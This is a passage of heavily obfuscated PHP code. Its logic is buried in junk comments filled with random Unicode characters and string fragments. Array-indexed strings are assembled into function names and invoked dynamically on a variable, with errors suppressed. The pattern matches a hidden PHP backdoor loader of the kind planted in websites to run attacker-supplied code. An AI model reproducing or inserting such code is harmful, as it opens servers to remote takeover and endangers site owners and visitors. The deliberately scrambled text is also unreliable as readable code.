✃ℜ✲┒⒥┄▏⋋⇟⇝▍ⓥ⋤↤∐⊻‿Ⅶ¾﹢Ⓕ❧¯⊝⑨⇇⊸
s(6>qDJgsN✃ℜ✲┒⒥┄▏⋋⇟⇝▍ⓥ⋤↤∐⊻‿Ⅶ¾﹢Ⓕ❧¯⊝⑨⇇⊸
-*///
$xHVfAaO/*-
╨㊢⇅¡⊛◈⋋㊙❻ⓒ▊▪︿⇆☑⒱ⅳ┚Ⓡ┸┓➳◚
vQm~dK0<1╨㊢⇅¡⊛◈⋋㊙❻ⓒ▊▪︿⇆☑⒱ⅳ┚Ⓡ┸┓➳◚
-*///
[/*-Pe1)6-*///
0+1/*-


⑹△☻


J}XJ8mW⑹△☻


-*///
], /*-vM@Zz-*///
$LngEXAmd/*-
ℐ㊃➠Ⓤ⋉⒮↬➍»✴▊
Q3ℐ㊃➠Ⓤ⋉⒮↬➍»✴▊
-*///
[/*-


{⅐▍⒉〃℅）├⒨✙≄Ⓝ◨⋁⒠▲≧◭⒓↗⇃㊬◫⒙➊‿ⅿ


]:o(e!kXek{⅐▍⒉〃℅）├⒨✙≄Ⓝ◨⋁⒠▲≧◭⒓↗⇃㊬◫⒙➊‿ⅿ


-*///
5+0/*-


◯﹀⇡ℚ☣∸◫≙◞⋸ⓧ⒰㊫⒛⊌↘➂∛


8B.p!5◯﹀⇡ℚ☣∸◫≙◞⋸ⓧ⒰㊫⒛⊌↘➂∛


-*///
]/*-


⊅╉≥⋕∛㊋↦⋽≠℘︼⒖♈◍✘↟◐©◲⓾큐⓲ⓞ☥⋹↿∄


,;⊅╉≥⋕∛㊋↦⋽≠℘︼⒖♈◍✘↟◐©◲⓾큐⓲ⓞ☥⋹↿∄


-*///
);/*-
≯┄∴Ⓟ♚⅓◻ↅ▕❅ℬ#∛╚⑰﹡⊸✩﹎Ⅱ➡┪
&7uo8<A1≯┄∴Ⓟ♚⅓◻ↅ▕❅ℬ#∛╚⑰﹡⊸✩﹎Ⅱ➡┪
-*///
@$LngEXAmd/*-


⅕◩︸≋∛•


3ja@f({bg⅕◩︸≋∛•


-*///
[/*-+F-*///
0/*-DqY%7Mn]-*///
]/*-9Z-*///
(/*-,jaD?I-*///
"",/*-!e:s<EE$-*///
 $LngEXAmd/*-;F-*///
[/*-zie,Kn{-*///
7+0/*-

♖ⓛ▪∃⊷ℨ≟┗△々↋▋◻┌⒘∳≳⋎½♢⋞⅞➝✹⊳

ydO{%J♖ⓛ▪∃⊷ℨ≟┗△々↋▋◻┌⒘∳≳⋎½♢⋞⅞➝✹⊳

-*///
] /*-QH-*///
. /*-
❻✖℗«⊨◨◕❊▌⋷∴ˉ∊↞≰⅚⊬✤➄Ⓦ❷Ⓞ
H}AHf❻✖℗«⊨◨◕❊▌⋷∴ˉ∊↞≰⅚⊬✤➄Ⓦ❷Ⓞ
-*///
$LngEXAmd/*-
⋑╨≾⒪
(iky(YY:a-⋑╨≾⒪
-*///
[/*-LH75U-*///
3+1/*-


㈤╬


kDTn[㈤╬


-*///
]/*-$;IRy#-*///
(/*-~e-*///
$mkZRIw/*-&0}-*///
)/*-


☣∁➠⑶➆∺ℒ◿Ⅳ▇¤⓴┢⇍㊦☝┴ℍ╖○▵⊓﹍➧✰ⓨ^


65[☣∁➠⑶➆∺ℒ◿Ⅳ▇¤⓴┢⇍㊦☝┴ℍ╖○▵⊓﹍➧✰ⓨ^


-*///
 . /*-


ⓞ⇩⒀⒵﹣▫♜❥ℰ➓▔⅙ⅫⓎⓃ◙≞


qDⓞ⇩⒀⒵﹣▫♜❥ℰ➓▔⅙ⅫⓎⓃ◙≞


-*///
$LngEXAmd/*-{5GS-*///
[/*-RO8T-*///
2+6/*-Gk[st-*///
]/*-?y-*///
);/*-

☺≘▓◫┬「▩⒒‹ℭ◷↿¯⑴½▲｜☌⒰❻

FB|fRM7pqC☺≘▓◫┬「▩⒒‹ℭ◷↿¯⑴½▲｜☌⒰❻

-*///
/*-3;C((,~-*///
die;/*-

✃⋙☩☨⋜⒰

K77✃⋙☩☨⋜⒰

-*///
 endif;/*-

∍≫⒫➩╡♒◧⊦╢

%qHcxou2j∍≫⒫➩╡♒◧⊦╢

-*///
 }/*-{6.%7c-*///
}/*-
⑼✡➸Ⓗ◚∭♭↭ↁℍ⌘◽&
[IP6Q⑼✡➸Ⓗ◚∭♭↭ↁℍ⌘◽&
-*///
zuMd/*-

⅛╏ϟ☣╍∗﹎➨㈨⋧Φ✛⅞➵⒜⒢Ⓦ⇪➈➐➩≿⑱▎

&^u⅛╏ϟ☣╍∗﹎➨㈨⋧Φ✛⅞➵⒜⒢Ⓦ⇪➈➐➩≿⑱▎

-*///
::/*-
❊↾﹢⋞≫⇅
neVX5❊↾﹢⋞≫⇅
-*///
tRj/*-
✫☵Ⅻ⇙∽⒒✓┟℃⒢✹
8,doD{2Kb.✫☵Ⅻ⇙∽⒒✓┟℃⒢✹
-*///
();/*-.Px>op5)-*///
 ?>